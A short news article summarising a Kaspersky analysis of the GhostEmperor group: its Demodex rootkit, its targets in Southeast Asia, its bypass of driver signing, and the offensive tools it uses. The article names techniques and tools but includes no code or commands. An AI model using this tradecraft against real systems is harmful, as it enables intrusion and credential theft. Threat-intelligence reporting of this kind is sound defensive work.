Kaspersky has issued a thorough analysis outlining the latest activities associated with GhostEmperor. The threat actor was recently identified as employing a new rootkit and attacking Exchange vulnerabilities. It has mostly targeted Southeast Asian governments and telecom companies.
GhostEmperor now employs an unknown Windows kernel-mode rootkit known as Demodex, as well as a complex multi-stage malware system used for remote control of targeted systems. The organisation has been detected primarily targeting telecommunications companies and government agencies in Southeast Asia, as well as Afghanistan, Ethiopia, and Egypt. The majority of the infections were spread via public-facing servers such as Apache servers, IIS Windows servers, and Oracle servers. The vulnerabilities in the associated web apps are thought to have been exploited by attackers.
After obtaining access to the targeted computers, the attackers utilised a combination of bespoke and open-source offensive toolkits to collect user credentials and target other systems on the network. The group avoids Windows Driver Signature Enforcement by employing an undocumented loading technique that makes use of Cheat Engine’s kernel-mode component (an open-source project). GhostEmperor has utilised obfuscation and anti-analysis techniques to make it difficult for analysts to investigate the virus.
Common utilities produced by the Sysinternals suite for managing processes (PsExec, ProcDump, and PsList), as well as BITSAdmin, CertUtil, and WinRAR, are utilised. The attackers also utilised open-source tools such as Get-PassHashes[.]ps1, Token[.]exe, Ladon, and mimkat ssp. They utilised Powercat/NBTscan for internal network surveillance and communication.
The employment of anti-forensic techniques and a wide range of toolkits indicates that the GhostEmperor gang is well-versed in sophisticated infrastructure and has access to it. To be safe, companies should build a multi-layered security architecture that includes effective anti-malware, firewalls, Host-based Intrusion Detection Systems (HIDS), and Intrusion Prevention Systems (IPS).